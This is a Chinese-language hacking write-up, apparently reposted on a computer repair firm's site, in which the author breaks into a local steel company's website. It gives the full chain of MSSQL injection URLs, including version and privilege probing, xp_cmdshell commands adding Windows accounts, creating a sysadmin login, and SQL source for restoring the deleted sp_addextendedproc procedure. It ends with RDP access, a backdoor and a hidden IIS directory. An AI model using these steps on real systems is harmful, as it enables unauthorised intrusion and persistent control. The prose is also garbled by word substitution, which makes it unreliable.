注射MSSQL时恢复sp_addextendedproc

  作者：小泥巴　　　　来自：第八军团
  本日没事做,对本地的一家钢铁企业的网站做了次安检,嘿嘿.漏洞一大把.固然 这是意猜中的事.近来搞各人都喜欢搞剧本.那我也就从他们的网站步伐看看了.
  show.aspx?id=1'
  嘿嘿 asp.net 还是暴 说什么有未闭合的分号.
  show.aspx?id=1 and (select @@version)>0;--
  果然,2003的系统
  show.aspx?id=1 and 'sa'=(select System_user)--
  嘿嘿 精确前往 有权限了 想到直接用xp_cmeshell直接添加帐号
  因为之前已经知道这服务器开了3389的
  所以 我们连续来：
  show.aspx?id=1;exec master.dbo.xp_cmdshell "net user haco lovehaco /add"--
  我倒,前往效果错误了 看来办理员还不是很可爱噢
  那我们来恢复这个存储历程？OK 连续
  show.aspx?id=1;exec master.dbo.sp_addextendedpro xp_cmdshell,@dllname='xplog70.dll'--
  回车后......狂晕去世.居然说什么历程sp_addextendedproc没找着 开端我以为是删除了xplog70.dll 可是厥后不如许如许认为了 记得以前也遇到过如许的事 可是都没能解决 这次肯定要搞定 嘿嘿！之后 到处问人
  这里要谢谢一下BST论坛里的tob88 谢谢 是他提示了我
  不就是历程SP_ADDextendedproc被删除了嘛 我们恢复它就是了嘛！
  为了方便 我添加了个sysadmin的帐号
  show.aspx?id=1;exec master.dbo.sp_addlogin haco,lovehaco;--
  show.aspx?id=1;exec master.dbo.sp_addsrvrolemember haco,sysadmin;-- HOHO~ 搞定 俺本身装了MSSQL 企业办理器里连上这台服务器的SQL
  调出查询器 恢复历程sp_addextendedproc 如下：
  create procedure sp_addextendedproc --- 1996/08/30 20:13
  @functname nvarchar(517),/* (owner.)name of function to call */
  @dllname varchar(255)/* name of DLL containing function */
  as
  set implicit_transactions off
  if @@trancount > 0
  begin
  raiserror(15002,-1,-1,'sp_addextendedproc')
  return (1)
  end
  dbcc addextendedproc( @functname, @dllname)
  return (0) -- sp_addextendedproc
  GO
  哈哈 试下 sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
  哇！下令成功完成 耶！添加帐号 登陆3389 留个我最喜欢的相对后门
  IIS隐藏虚拟目录 搞定 闪人......
  PS：实在像sp_addextendedproc这些历程也都可以删除掉 就不克不及添加了
  固然 也可以恢复的 这个恢复的语句 是从MSSQL数据库里失掉的 有兴味的朋侪可以本身尝尝看 呵呵 这是我小泥巴第一次写工具 很稀烂的 各人看看就算了 别笑噢 要不 我会5555哭的噢！
 

文章作者: 福州军威计算机技术有限公司
军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
版权声明：原创作品，允许转载，转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。

评论加载中... 内容： 评论者： 验证码：